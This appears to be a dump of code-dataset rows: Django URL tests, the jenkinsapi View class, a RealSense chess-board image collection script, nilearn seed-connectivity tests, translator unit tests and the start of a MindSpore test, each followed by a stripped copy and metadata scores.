self.assertEqual(response, True)
url = reverse('target:list')
response = c.get(url)
self.assertEqual(response.status_code, 200)
target = models.Target.objects.all()[0]
url = reverse('target:detail', args=(target.number,))
response = c.get(url)
self.assertEqual(response.status_code, 200)
url = reverse('target:create')
response = c.post(url)
self.assertEqual(response.status_code, 200)
url = reverse('target:create_letters', args=('practical',))
response = c.post(url)
self.assertEqual(response.status_code, 200)
url = reverse('target:delete', args=(1,))
response = c.get(url)
self.assertEqual(response.status_code, 200)
| from django.contrib.auth.models import User
from django.test import TestCase
from django.test import Client
from django.urls import reverse
from target import models
from django.utils import timezone
# Create your tests here.
class URLSWork(TestCase):
@classmethod
def setUpTestData(cls):
target = models.Target()
target.letters = 'practical'
target.words = 'practical'
target.published = timezone.now()
target.number = 1
target.save()
def test_urls(self):
user = User.objects.create_user('admin', '<EMAIL>', '<PASSWORD>')
user.is_staff = True
user.is_active = True
user.is_superuser = True
user.save()
c = Client()
response = c.login(username='admin', password='<PASSWORD>')
self.assertEqual(response, True)
url = reverse('target:list')
response = c.get(url)
self.assertEqual(response.status_code, 200)
target = models.Target.objects.all()[0]
url = reverse('target:detail', args=(target.number,))
response = c.get(url)
self.assertEqual(response.status_code, 200)
url = reverse('target:create')
response = c.post(url)
self.assertEqual(response.status_code, 200)
url = reverse('target:create_letters', args=('practical',))
response = c.post(url)
self.assertEqual(response.status_code, 200)
url = reverse('target:delete', args=(1,))
response = c.get(url)
self.assertEqual(response.status_code, 200) | en | 0.95562 | # Create your tests here. | 2.474484 | 2 |
jenkinsapi/view.py | julienduchesne/jenkinsapi | 0 | 8536 | <reponame>julienduchesne/jenkinsapi
"""
Module for jenkinsapi views
"""
import six
import logging
from jenkinsapi.jenkinsbase import JenkinsBase
from jenkinsapi.job import Job
from jenkinsapi.custom_exceptions import NotFound
log = logging.getLogger(__name__)
class View(JenkinsBase):
"""
View class
"""
def __init__(self, url, name, jenkins_obj):
self.name = name
self.jenkins_obj = jenkins_obj
JenkinsBase.__init__(self, url)
self.deleted = False
def __str__(self):
return self.name
def __getitem__(self, job_name):
assert isinstance(job_name, str)
api_url = self.python_api_url(self.get_job_url(job_name))
return Job(api_url, job_name, self.jenkins_obj)
def __contains__(self, job_name):
"""
True if view_name is the name of a defined view
"""
return job_name in self.keys()
def delete(self):
"""
Remove this view object
"""
url = "%s/doDelete" % self.baseurl
self.jenkins_obj.requester.post_and_confirm_status(url, data='')
self.jenkins_obj.poll()
self.deleted = True
def keys(self):
return self.get_job_dict().keys()
def iteritems(self):
it = six.iteritems(self.get_job_dict())
for name, url in it:
yield name, Job(url, name, self.jenkins_obj)
def values(self):
return [a[1] for a in self.iteritems()]
def items(self):
return [a for a in self.iteritems()]
def _get_jobs(self):
if 'jobs' in self._data:
for viewdict in self._data["jobs"]:
yield viewdict["name"], viewdict["url"]
def get_job_dict(self):
return dict(self._get_jobs())
def __len__(self):
return len(self.get_job_dict().keys())
def get_job_url(self, str_job_name):
if str_job_name in self:
return self.get_job_dict()[str_job_name]
else:
# noinspection PyUnboundLocalVariable
views_jobs = ", ".join(self.get_job_dict().keys())
raise NotFound("Job %s is not known, available jobs"
" in view are: %s" % (str_job_name, views_jobs))
def get_jenkins_obj(self):
return self.jenkins_obj
def add_job(self, str_job_name, job=None):
"""
Add job to a view
:param str_job_name: name of the job to be added
:param job: Job object to be added
:return: True if job has been added, False if job already exists or
job not known to Jenkins
"""
if not job:
if str_job_name in self.get_job_dict():
log.warning(
'Job %s is already in the view %s',
str_job_name, self.name)
return False
else:
# Since this call can be made from nested view,
# which doesn't have any jobs, we can miss existing job
# Thus let's create top level Jenkins and ask him
# http://jenkins:8080/view/CRT/view/CRT-FB/view/CRT-SCRT-1301/
top_jenkins = self.get_jenkins_obj().get_jenkins_obj_from_url(
self.baseurl.split('view/')[0])
if not top_jenkins.has_job(str_job_name):
log.error(
msg='Job "%s" is not known to Jenkins' %
str_job_name)
return False
else:
job = top_jenkins.get_job(str_job_name)
log.info(msg='Creating job %s in view %s' % (str_job_name, self.name))
url = '%s/addJobToView' % self.baseurl
params = {'name': str_job_name}
self.get_jenkins_obj().requester.post_and_confirm_status(
url,
data={},
params=params)
self.poll()
log.debug(msg='Job "%s" has been added to a view "%s"' %
(job.name, self.name))
return True
def _get_nested_views(self):
for viewdict in self._data.get("views", []):
yield viewdict["name"], viewdict["url"]
def get_nested_view_dict(self):
return dict(self._get_nested_views())
def get_config_xml_url(self):
return '%s/config.xml' % self.baseurl
def get_config(self):
"""
Return the config.xml from the view
"""
url = self.get_config_xml_url()
response = self.get_jenkins_obj().requester.get_and_confirm_status(url)
return response.text
def update_config(self, config):
"""
Update the config.xml to the view
"""
url = self.get_config_xml_url()
config = str(config) # cast unicode in case of Python 2
response = self.get_jenkins_obj().requester.post_url(
url, params={}, data=config)
return response.text
@property
def views(self):
return self.get_jenkins_obj().get_jenkins_obj_from_url(
self.baseurl).views
| """
Module for jenkinsapi views
"""
import six
import logging
from jenkinsapi.jenkinsbase import JenkinsBase
from jenkinsapi.job import Job
from jenkinsapi.custom_exceptions import NotFound
log = logging.getLogger(__name__)
class View(JenkinsBase):
"""
View class
"""
def __init__(self, url, name, jenkins_obj):
self.name = name
self.jenkins_obj = jenkins_obj
JenkinsBase.__init__(self, url)
self.deleted = False
def __str__(self):
return self.name
def __getitem__(self, job_name):
assert isinstance(job_name, str)
api_url = self.python_api_url(self.get_job_url(job_name))
return Job(api_url, job_name, self.jenkins_obj)
def __contains__(self, job_name):
"""
True if view_name is the name of a defined view
"""
return job_name in self.keys()
def delete(self):
"""
Remove this view object
"""
url = "%s/doDelete" % self.baseurl
self.jenkins_obj.requester.post_and_confirm_status(url, data='')
self.jenkins_obj.poll()
self.deleted = True
def keys(self):
return self.get_job_dict().keys()
def iteritems(self):
it = six.iteritems(self.get_job_dict())
for name, url in it:
yield name, Job(url, name, self.jenkins_obj)
def values(self):
return [a[1] for a in self.iteritems()]
def items(self):
return [a for a in self.iteritems()]
def _get_jobs(self):
if 'jobs' in self._data:
for viewdict in self._data["jobs"]:
yield viewdict["name"], viewdict["url"]
def get_job_dict(self):
return dict(self._get_jobs())
def __len__(self):
return len(self.get_job_dict().keys())
def get_job_url(self, str_job_name):
if str_job_name in self:
return self.get_job_dict()[str_job_name]
else:
# noinspection PyUnboundLocalVariable
views_jobs = ", ".join(self.get_job_dict().keys())
raise NotFound("Job %s is not known, available jobs"
" in view are: %s" % (str_job_name, views_jobs))
def get_jenkins_obj(self):
return self.jenkins_obj
def add_job(self, str_job_name, job=None):
"""
Add job to a view
:param str_job_name: name of the job to be added
:param job: Job object to be added
:return: True if job has been added, False if job already exists or
job not known to Jenkins
"""
if not job:
if str_job_name in self.get_job_dict():
log.warning(
'Job %s is already in the view %s',
str_job_name, self.name)
return False
else:
# Since this call can be made from nested view,
# which doesn't have any jobs, we can miss existing job
# Thus let's create top level Jenkins and ask him
# http://jenkins:8080/view/CRT/view/CRT-FB/view/CRT-SCRT-1301/
top_jenkins = self.get_jenkins_obj().get_jenkins_obj_from_url(
self.baseurl.split('view/')[0])
if not top_jenkins.has_job(str_job_name):
log.error(
msg='Job "%s" is not known to Jenkins' %
str_job_name)
return False
else:
job = top_jenkins.get_job(str_job_name)
log.info(msg='Creating job %s in view %s' % (str_job_name, self.name))
url = '%s/addJobToView' % self.baseurl
params = {'name': str_job_name}
self.get_jenkins_obj().requester.post_and_confirm_status(
url,
data={},
params=params)
self.poll()
log.debug(msg='Job "%s" has been added to a view "%s"' %
(job.name, self.name))
return True
def _get_nested_views(self):
for viewdict in self._data.get("views", []):
yield viewdict["name"], viewdict["url"]
def get_nested_view_dict(self):
return dict(self._get_nested_views())
def get_config_xml_url(self):
return '%s/config.xml' % self.baseurl
def get_config(self):
"""
Return the config.xml from the view
"""
url = self.get_config_xml_url()
response = self.get_jenkins_obj().requester.get_and_confirm_status(url)
return response.text
def update_config(self, config):
"""
Update the config.xml to the view
"""
url = self.get_config_xml_url()
config = str(config) # cast unicode in case of Python 2
response = self.get_jenkins_obj().requester.post_url(
url, params={}, data=config)
return response.text
@property
def views(self):
return self.get_jenkins_obj().get_jenkins_obj_from_url(
self.baseurl).views | en | 0.881594 | Module for jenkinsapi views View class True if view_name is the name of a defined view Remove this view object # noinspection PyUnboundLocalVariable Add job to a view :param str_job_name: name of the job to be added :param job: Job object to be added :return: True if job has been added, False if job already exists or job not known to Jenkins # Since this call can be made from nested view, # which doesn't have any jobs, we can miss existing job # Thus let's create top level Jenkins and ask him # http://jenkins:8080/view/CRT/view/CRT-FB/view/CRT-SCRT-1301/ Return the config.xml from the view Update the config.xml to the view # cast unicode in case of Python 2 | 2.421739 | 2 |
core/vision/collection.py | jmarangola/cv-chess | 0 | 8537 | """
Autonomous dataset collection of data for jetson nano
<NAME> - <EMAIL>
"""
import datasets
import json
from datasets import Board, ChessPiece, PieceColor, PieceType
#from realsense_utils import RealSenseCamera
import preprocessing as pr
import cv2
import pandas as pd
import os
from os.path import isfile, join
import uuid
import numpy as np
import uuid
from PIL import Image
from PIL.ExifTags import TAGS
RUN_CALIBRATION = False # Run calibration sequence or use preexisting board four corners data from config/setup.txt
BOARD_SAVE_DEST= r"board_metadata.jpeg" # Where the debug metadata board visualization image is saved (to ensure we properly setup the metadata)
TMP_DEST = "/home/spark/cv-chess/core/vision/tmp/" # Where images are temporarily saved before being uploaded to drive in a batch
LOCAL_MD_FILENAME = "local_meta.json"
LOCAL_METADATA_JSON_PATH = TMP_DEST + LOCAL_MD_FILENAME
TL = [250, 115]
BL = [250, 687]
TR = [825, 115]
BR = [825, 687]
def rotate_image(image, angle):
image_center = tuple(np.array(image.shape[1::-1]) / 2)
rot_mat = cv2.getRotationMatrix2D(image_center, angle, 1.0)
result = cv2.warpAffine(image, rot_mat, image.shape[1::-1], flags=cv2.INTER_LINEAR)
return result
def fen_to_dict(string):
name_to_num = {
'p' : 1,
'b' : 2,
'n' : 3,
'r' : 4,
'q' : 5,
'k' : 6,
}
out = {}
letters = "ABCDEFGH"
for i in range(8):
for j in range(1,9):
out[letters[i] + str(j)] = 0
string = string.split('/')
new_string = []
for s in string:
for d in s:
if d.isnumeric():
ix = s.index(d)
for i in range(int(d)-1):
s = s[0:ix] + '1' + s[ix:]
new_string.append(s)
for i in range(8, 0, -1):
for j in range(8):
if new_string[8-i][j].isnumeric():
out[letters[j] + str(i)] = 0
else:
out[letters[j] + str(i)] = name_to_num[new_string[8-i][j].lower()]
return out
def get_sorted_time_saved(images):
"""
Given a list of image filenames, return a dictionary of image filename : time written to disk pairs.
Purpose: for debugging dataset
Args:
images (list): List of image filenames
Returns:
dict: dict of image filenames
"""
image_dat = []
for image in images:
imtmp = Image.open(image)
tmp = imtmp.getexif()
image_dat.append(tmp)
dt = {}
for exifdata in image_dat:
idx = image_dat.index(exifdata)
# iterating over all EXIF data fields
for tag_id in exifdata:
tag = TAGS.get(tag_id, tag_id)
data = exifdata.get(tag_id)
# decode bytes
if isinstance(data, bytes):
data = data.decode()
# Add datetime field
if tag == "DateTime":
dt[images[idx]] = data
print(f"{tag:25}: {data}")
output = sorted(dt.items(), key=lambda eta: eta[1], reverse=False)
print(output)
dt = {}
for item in output:
dt[item[0]] = item[1]
with open(TMP_DEST + "datetimes.json", "w") as wr: # dump to json
json.dump(output, wr)
return output
def del_batch_from_text_file(file):
filenames = []
with open(file, "r") as rd:
for line in rd.readlines():
# parse each line for file to delete:
commaIndex = line.index(",")
filename = line[:commaIndex]
os.remove(TMP_DEST + filename)
if __name__ == "__main__":
# Initialize camera
realsense = RealSenseCamera()
"""
# Check if calibration sequence must be run
if RUN_CALIBRATION:
realsense.calibrate_board_pos()
if realsense.get_board_corners() is None:
print("Failed to run calibration. Exiting...")
exit()
"""
"""
board_meta = Board()
# Add pieces to metadata csv
board_meta.add_pieces({
"A1":ChessPiece(PieceType.KNIGHT, PieceColor.BLUE), "A2":ChessPiece(PieceType.PAWN, PieceColor.BLUE), "A3":ChessPiece(PieceType.PAWN, PieceColor.ORANGE)
})
board_meta.display_board(dest=BOARD_SAVE_DEST)
print(f"Verify board is correct output dest={BOARD_SAVE_DEST}.\nContine [Y] or Exit [E]?")
validate = input()
if validate.upper() == "E" or validate.upper() == "N":
print("Exiting...")
realsense.stop_pipeline()
exit()
files = []
files = [f for f in os.listdir(TMP_DEST) if isfile(os.path.join(TMP_DEST, f))]
# Check to see if there is pre-existing .csv metadata to add to
if LOCAL_MD_FILENAME in files:
try:
total_metadata = pd.read_csv(LOCAL_METADATA_JSON_PATH)
except:
total_metadata = pd.DataFrame()
else:
total_metadata = pd.DataFrame()
# Loop through input
while input() != "exit":
img = realsense.capture_rgb_image() # Capture the image
img = img[105:690, 348:940, :]
img = rotate_image(img, 1.5)
files = pr.board_to_64_files(img, base_directory=TMP_DEST) # Break image up into 64 files
piece_types, piece_colors = [], []
batch_id = uuid.uuid1()
for tile in sorted(files.keys()):
temp = board_meta.get_chess_piece(tile)
if temp is None:
piece_types.append(None)
piece_colors.append(None)
else:
piece_types.append(temp.piece_type.name)
piece_colors.append(temp.piece_color.name)
tmp_meta = pd.DataFrame({
"File" : [files[file] for file in files.keys()],
"Position" : [file for file in files.keys()],
"Piece Type" : piece_types,
"Piece Color" : piece_colors,
"Batch ID" : [batch_id for i in range(len(files.keys()))]
})
frames = [total_metadata, tmp_meta]
total_metadata = pd.concat(frames) # Concatenate dataframes
print(total_metadata)
total_metadata.to_csv(path_or_buf=LOCAL_METADATA_JSON_PATH)
"""
#pr.delete_board2_64_output(base_directory=TMP_DEST)
FEN = "5P1R/1Q1RP1P1/3R1P2/QQPPK1R1/1B1K1N2/B1R2N1B/1N2B3R/2B1BN2".upper()
last_input = None
df = pd.DataFrame()
while input() != "end":
resp = input("[n] for new fen, [anything key to take an image] >")
if resp == "new":
fen = input("Enter a FEN:").upper()
img = realsense.capture_rgb_image() # Capture the image
print("Captured image")
img = img[105:690, 348:940, :]
img = rotate_image(img, 1.5)
cv2.imwrite("original.jpg", img)
# Get dict of positions
temp_dict = fen_to_dict(FEN)
tiles = pr.board_to_64_files(img, temp_dict, base_directory=TMP_DEST) # Break image up into 64 files
data_frame = pd.DataFrame(tiles)
data_frame = data_frame.transpose()
frames = [df, data_frame]
df = pd.concat(frames) # Concatenate dataframe
csv_file = df.to_csv(TMP_DEST + 'my_csv.csv', header=False, index=False)
# Close streams and end pipeline
realsense.stop_pipeline()
| """
Autonomous dataset collection of data for jetson nano
<NAME> - <EMAIL>
"""
import datasets
import json
from datasets import Board, ChessPiece, PieceColor, PieceType
#from realsense_utils import RealSenseCamera
import preprocessing as pr
import cv2
import pandas as pd
import os
from os.path import isfile, join
import uuid
import numpy as np
import uuid
from PIL import Image
from PIL.ExifTags import TAGS
RUN_CALIBRATION = False # Run calibration sequence or use preexisting board four corners data from config/setup.txt
BOARD_SAVE_DEST= r"board_metadata.jpeg" # Where the debug metadata board visualization image is saved (to ensure we properly setup the metadata)
TMP_DEST = "/home/spark/cv-chess/core/vision/tmp/" # Where images are temporarily saved before being uploaded to drive in a batch
LOCAL_MD_FILENAME = "local_meta.json"
LOCAL_METADATA_JSON_PATH = TMP_DEST + LOCAL_MD_FILENAME
TL = [250, 115]
BL = [250, 687]
TR = [825, 115]
BR = [825, 687]
def rotate_image(image, angle):
image_center = tuple(np.array(image.shape[1::-1]) / 2)
rot_mat = cv2.getRotationMatrix2D(image_center, angle, 1.0)
result = cv2.warpAffine(image, rot_mat, image.shape[1::-1], flags=cv2.INTER_LINEAR)
return result
def fen_to_dict(string):
name_to_num = {
'p' : 1,
'b' : 2,
'n' : 3,
'r' : 4,
'q' : 5,
'k' : 6,
}
out = {}
letters = "ABCDEFGH"
for i in range(8):
for j in range(1,9):
out[letters[i] + str(j)] = 0
string = string.split('/')
new_string = []
for s in string:
for d in s:
if d.isnumeric():
ix = s.index(d)
for i in range(int(d)-1):
s = s[0:ix] + '1' + s[ix:]
new_string.append(s)
for i in range(8, 0, -1):
for j in range(8):
if new_string[8-i][j].isnumeric():
out[letters[j] + str(i)] = 0
else:
out[letters[j] + str(i)] = name_to_num[new_string[8-i][j].lower()]
return out
def get_sorted_time_saved(images):
"""
Given a list of image filenames, return a dictionary of image filename : time written to disk pairs.
Purpose: for debugging dataset
Args:
images (list): List of image filenames
Returns:
dict: dict of image filenames
"""
image_dat = []
for image in images:
imtmp = Image.open(image)
tmp = imtmp.getexif()
image_dat.append(tmp)
dt = {}
for exifdata in image_dat:
idx = image_dat.index(exifdata)
# iterating over all EXIF data fields
for tag_id in exifdata:
tag = TAGS.get(tag_id, tag_id)
data = exifdata.get(tag_id)
# decode bytes
if isinstance(data, bytes):
data = data.decode()
# Add datetime field
if tag == "DateTime":
dt[images[idx]] = data
print(f"{tag:25}: {data}")
output = sorted(dt.items(), key=lambda eta: eta[1], reverse=False)
print(output)
dt = {}
for item in output:
dt[item[0]] = item[1]
with open(TMP_DEST + "datetimes.json", "w") as wr: # dump to json
json.dump(output, wr)
return output
def del_batch_from_text_file(file):
filenames = []
with open(file, "r") as rd:
for line in rd.readlines():
# parse each line for file to delete:
commaIndex = line.index(",")
filename = line[:commaIndex]
os.remove(TMP_DEST + filename)
if __name__ == "__main__":
# Initialize camera
realsense = RealSenseCamera()
"""
# Check if calibration sequence must be run
if RUN_CALIBRATION:
realsense.calibrate_board_pos()
if realsense.get_board_corners() is None:
print("Failed to run calibration. Exiting...")
exit()
"""
"""
board_meta = Board()
# Add pieces to metadata csv
board_meta.add_pieces({
"A1":ChessPiece(PieceType.KNIGHT, PieceColor.BLUE), "A2":ChessPiece(PieceType.PAWN, PieceColor.BLUE), "A3":ChessPiece(PieceType.PAWN, PieceColor.ORANGE)
})
board_meta.display_board(dest=BOARD_SAVE_DEST)
print(f"Verify board is correct output dest={BOARD_SAVE_DEST}.\nContine [Y] or Exit [E]?")
validate = input()
if validate.upper() == "E" or validate.upper() == "N":
print("Exiting...")
realsense.stop_pipeline()
exit()
files = []
files = [f for f in os.listdir(TMP_DEST) if isfile(os.path.join(TMP_DEST, f))]
# Check to see if there is pre-existing .csv metadata to add to
if LOCAL_MD_FILENAME in files:
try:
total_metadata = pd.read_csv(LOCAL_METADATA_JSON_PATH)
except:
total_metadata = pd.DataFrame()
else:
total_metadata = pd.DataFrame()
# Loop through input
while input() != "exit":
img = realsense.capture_rgb_image() # Capture the image
img = img[105:690, 348:940, :]
img = rotate_image(img, 1.5)
files = pr.board_to_64_files(img, base_directory=TMP_DEST) # Break image up into 64 files
piece_types, piece_colors = [], []
batch_id = uuid.uuid1()
for tile in sorted(files.keys()):
temp = board_meta.get_chess_piece(tile)
if temp is None:
piece_types.append(None)
piece_colors.append(None)
else:
piece_types.append(temp.piece_type.name)
piece_colors.append(temp.piece_color.name)
tmp_meta = pd.DataFrame({
"File" : [files[file] for file in files.keys()],
"Position" : [file for file in files.keys()],
"Piece Type" : piece_types,
"Piece Color" : piece_colors,
"Batch ID" : [batch_id for i in range(len(files.keys()))]
})
frames = [total_metadata, tmp_meta]
total_metadata = pd.concat(frames) # Concatenate dataframes
print(total_metadata)
total_metadata.to_csv(path_or_buf=LOCAL_METADATA_JSON_PATH)
"""
#pr.delete_board2_64_output(base_directory=TMP_DEST)
FEN = "5P1R/1Q1RP1P1/3R1P2/QQPPK1R1/1B1K1N2/B1R2N1B/1N2B3R/2B1BN2".upper()
last_input = None
df = pd.DataFrame()
while input() != "end":
resp = input("[n] for new fen, [anything key to take an image] >")
if resp == "new":
fen = input("Enter a FEN:").upper()
img = realsense.capture_rgb_image() # Capture the image
print("Captured image")
img = img[105:690, 348:940, :]
img = rotate_image(img, 1.5)
cv2.imwrite("original.jpg", img)
# Get dict of positions
temp_dict = fen_to_dict(FEN)
tiles = pr.board_to_64_files(img, temp_dict, base_directory=TMP_DEST) # Break image up into 64 files
data_frame = pd.DataFrame(tiles)
data_frame = data_frame.transpose()
frames = [df, data_frame]
df = pd.concat(frames) # Concatenate dataframe
csv_file = df.to_csv(TMP_DEST + 'my_csv.csv', header=False, index=False)
# Close streams and end pipeline
realsense.stop_pipeline()
| en | 0.496621 | Autonomous dataset collection of data for jetson nano <NAME> - <EMAIL> #from realsense_utils import RealSenseCamera # Run calibration sequence or use preexisting board four corners data from config/setup.txt # Where the debug metadata board visualization image is saved (to ensure we properly setup the metadata) # Where images are temporarily saved before being uploaded to drive in a batch Given a list of image filenames, return a dictionary of image filename : time written to disk pairs. Purpose: for debugging dataset Args: images (list): List of image filenames Returns: dict: dict of image filenames # iterating over all EXIF data fields # decode bytes # Add datetime field # dump to json # parse each line for file to delete: # Initialize camera # Check if calibration sequence must be run if RUN_CALIBRATION: realsense.calibrate_board_pos() if realsense.get_board_corners() is None: print("Failed to run calibration. Exiting...") exit() board_meta = Board() # Add pieces to metadata csv board_meta.add_pieces({ "A1":ChessPiece(PieceType.KNIGHT, PieceColor.BLUE), "A2":ChessPiece(PieceType.PAWN, PieceColor.BLUE), "A3":ChessPiece(PieceType.PAWN, PieceColor.ORANGE) }) board_meta.display_board(dest=BOARD_SAVE_DEST) print(f"Verify board is correct output dest={BOARD_SAVE_DEST}.\nContine [Y] or Exit [E]?") validate = input() if validate.upper() == "E" or validate.upper() == "N": print("Exiting...") realsense.stop_pipeline() exit() files = [] files = [f for f in os.listdir(TMP_DEST) if isfile(os.path.join(TMP_DEST, f))] # Check to see if there is pre-existing .csv metadata to add to if LOCAL_MD_FILENAME in files: try: total_metadata = pd.read_csv(LOCAL_METADATA_JSON_PATH) except: total_metadata = pd.DataFrame() else: total_metadata = pd.DataFrame() # Loop through input while input() != "exit": img = realsense.capture_rgb_image() # Capture the image img = img[105:690, 348:940, :] img = rotate_image(img, 1.5) files = pr.board_to_64_files(img, base_directory=TMP_DEST) # Break image up into 64 files piece_types, piece_colors = [], [] batch_id = uuid.uuid1() for tile in sorted(files.keys()): temp = board_meta.get_chess_piece(tile) if temp is None: piece_types.append(None) piece_colors.append(None) else: piece_types.append(temp.piece_type.name) piece_colors.append(temp.piece_color.name) tmp_meta = pd.DataFrame({ "File" : [files[file] for file in files.keys()], "Position" : [file for file in files.keys()], "Piece Type" : piece_types, "Piece Color" : piece_colors, "Batch ID" : [batch_id for i in range(len(files.keys()))] }) frames = [total_metadata, tmp_meta] total_metadata = pd.concat(frames) # Concatenate dataframes print(total_metadata) total_metadata.to_csv(path_or_buf=LOCAL_METADATA_JSON_PATH) #pr.delete_board2_64_output(base_directory=TMP_DEST) # Capture the image # Get dict of positions # Break image up into 64 files # Concatenate dataframe # Close streams and end pipeline | 2.465792 | 2 |
tests/test_sbfc.py | htwangtw/sbfc | 0 | 8538 | <reponame>htwangtw/sbfc
import os
import numpy as np
import pandas as pd
from nilearn import datasets
from sbfc.parser import seed_base_connectivity
seed = os.path.dirname(__file__) + "/data/difumo64_pcc.nii.gz"
def _make_data_single_run(confound=True):
adhd_dataset = datasets.fetch_adhd(n_subjects=2)
group_confounds = pd.DataFrame(adhd_dataset.phenotypic)[
["Subject", "MeanFD", "age", "sex"]
]
group_confounds = group_confounds.rename(columns={"Subject": "subject_label"})
group_design_matrix = pd.DataFrame(adhd_dataset.phenotypic)[["Subject"]]
group_design_matrix = group_design_matrix.rename(
columns={"Subject": "subject_label"}
)
group_design_matrix["pheno"] = np.random.rand(2)
group_contrast = pd.DataFrame([1], columns=["pheno"])
if confound:
func_img = {
f"{sub_id}": {"func": [func], "confound": [confound]}
for func, confound, sub_id in zip(
adhd_dataset.func, adhd_dataset.confounds, group_confounds.index
)
}
else:
func_img = {
f"{sub_id}": {"func": [func], "confound": [None]}
for func, confound, sub_id in zip(
adhd_dataset.func, adhd_dataset.confounds, group_confounds.index
)
}
return func_img, group_design_matrix, group_confounds, group_contrast
def _make_data_multi_run():
adhd_dataset = datasets.fetch_adhd(n_subjects=2)
group_confounds = pd.DataFrame(adhd_dataset.phenotypic)[
["Subject", "MeanFD", "age", "sex"]
]
group_confounds = group_confounds.rename(columns={"Subject": "subject_label"})
group_design_matrix = pd.DataFrame(adhd_dataset.phenotypic)[["Subject"]]
group_design_matrix = group_design_matrix.rename(
columns={"Subject": "subject_label"}
)
group_design_matrix["pheno"] = np.random.rand(2)
group_contrast = pd.DataFrame([1], columns=["pheno"])
func_img = {
f"{sub_id}": {"func": [func, func], "confound": [confound, confound]}
for func, confound, sub_id in zip(
adhd_dataset.func, adhd_dataset.confounds, group_confounds.index
)
}
return func_img, group_design_matrix, group_confounds, group_contrast
def test_sbfc_single_run(tmpdir):
(
func_img,
group_design_matrix,
group_confounds,
group_contrast,
) = _make_data_single_run()
# Prepare seed
pcc_coords = (0, -53, 26)
first_m, first_con, s_m = seed_base_connectivity(
func_img,
pcc_coords,
group_confounds,
group_design_matrix,
group_contrast,
write_dir=tmpdir,
)
assert len(first_m) == 2
(
func_img,
group_design_matrix,
group_confounds,
group_contrast,
) = _make_data_single_run(confound=False)
# mask seed
first_m, first_con, s_m = seed_base_connectivity(
func_img,
seed,
group_confounds,
group_design_matrix,
group_contrast,
write_dir=tmpdir,
)
assert len(first_m) == 2
def test_sbfc_mutli_run(tmpdir):
(
func_img,
group_design_matrix,
group_confounds,
group_contrast,
) = _make_data_multi_run()
# mask seed
first_m, first_con, s_m = seed_base_connectivity(
func_img,
seed,
group_confounds,
group_design_matrix,
group_contrast,
write_dir=tmpdir,
)
assert len(first_m) == 2
| import os
import numpy as np
import pandas as pd
from nilearn import datasets
from sbfc.parser import seed_base_connectivity
seed = os.path.dirname(__file__) + "/data/difumo64_pcc.nii.gz"
def _make_data_single_run(confound=True):
adhd_dataset = datasets.fetch_adhd(n_subjects=2)
group_confounds = pd.DataFrame(adhd_dataset.phenotypic)[
["Subject", "MeanFD", "age", "sex"]
]
group_confounds = group_confounds.rename(columns={"Subject": "subject_label"})
group_design_matrix = pd.DataFrame(adhd_dataset.phenotypic)[["Subject"]]
group_design_matrix = group_design_matrix.rename(
columns={"Subject": "subject_label"}
)
group_design_matrix["pheno"] = np.random.rand(2)
group_contrast = pd.DataFrame([1], columns=["pheno"])
if confound:
func_img = {
f"{sub_id}": {"func": [func], "confound": [confound]}
for func, confound, sub_id in zip(
adhd_dataset.func, adhd_dataset.confounds, group_confounds.index
)
}
else:
func_img = {
f"{sub_id}": {"func": [func], "confound": [None]}
for func, confound, sub_id in zip(
adhd_dataset.func, adhd_dataset.confounds, group_confounds.index
)
}
return func_img, group_design_matrix, group_confounds, group_contrast
def _make_data_multi_run():
adhd_dataset = datasets.fetch_adhd(n_subjects=2)
group_confounds = pd.DataFrame(adhd_dataset.phenotypic)[
["Subject", "MeanFD", "age", "sex"]
]
group_confounds = group_confounds.rename(columns={"Subject": "subject_label"})
group_design_matrix = pd.DataFrame(adhd_dataset.phenotypic)[["Subject"]]
group_design_matrix = group_design_matrix.rename(
columns={"Subject": "subject_label"}
)
group_design_matrix["pheno"] = np.random.rand(2)
group_contrast = pd.DataFrame([1], columns=["pheno"])
func_img = {
f"{sub_id}": {"func": [func, func], "confound": [confound, confound]}
for func, confound, sub_id in zip(
adhd_dataset.func, adhd_dataset.confounds, group_confounds.index
)
}
return func_img, group_design_matrix, group_confounds, group_contrast
def test_sbfc_single_run(tmpdir):
(
func_img,
group_design_matrix,
group_confounds,
group_contrast,
) = _make_data_single_run()
# Prepare seed
pcc_coords = (0, -53, 26)
first_m, first_con, s_m = seed_base_connectivity(
func_img,
pcc_coords,
group_confounds,
group_design_matrix,
group_contrast,
write_dir=tmpdir,
)
assert len(first_m) == 2
(
func_img,
group_design_matrix,
group_confounds,
group_contrast,
) = _make_data_single_run(confound=False)
# mask seed
first_m, first_con, s_m = seed_base_connectivity(
func_img,
seed,
group_confounds,
group_design_matrix,
group_contrast,
write_dir=tmpdir,
)
assert len(first_m) == 2
def test_sbfc_mutli_run(tmpdir):
(
func_img,
group_design_matrix,
group_confounds,
group_contrast,
) = _make_data_multi_run()
# mask seed
first_m, first_con, s_m = seed_base_connectivity(
func_img,
seed,
group_confounds,
group_design_matrix,
group_contrast,
write_dir=tmpdir,
)
assert len(first_m) == 2 | en | 0.458905 | # Prepare seed # mask seed # mask seed | 2.324539 | 2 |
final_project/machinetranslation/tests/test.py | ChrisOmeh/xzceb-flask_eng_fr | 0 | 8539 | <gh_stars>0
import unittest
from translator import english_to_french, french_to_english
class TestenglishToFrench(unittest.TestCase):
def test1(self):
self.assertEqual(english_to_french(["Hello"]), "Bonjour")
self.assertNotEqual(english_to_french(["Bonjour"]), "Hello")
class TestfrenchToEnglish(unittest.TestCase):
def test1(self):
self.assertEqual(french_to_english(["Bonjour"]),'Hello')
self.assertNotEqual(french_to_english(["Hello"]), "Bonjour")
if __name__ == "__main__":
unittest.main() | import unittest
from translator import english_to_french, french_to_english
class TestenglishToFrench(unittest.TestCase):
def test1(self):
self.assertEqual(english_to_french(["Hello"]), "Bonjour")
self.assertNotEqual(english_to_french(["Bonjour"]), "Hello")
class TestfrenchToEnglish(unittest.TestCase):
def test1(self):
self.assertEqual(french_to_english(["Bonjour"]),'Hello')
self.assertNotEqual(french_to_english(["Hello"]), "Bonjour")
if __name__ == "__main__":
unittest.main() | none | 1 | 3.384967 | 3 |
|
tests/ut/python/parallel/test_auto_parallel_transformer.py | huxian123/mindspore | 2 | 8540 | <reponame>huxian123/mindspore
# Copyright 2019 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
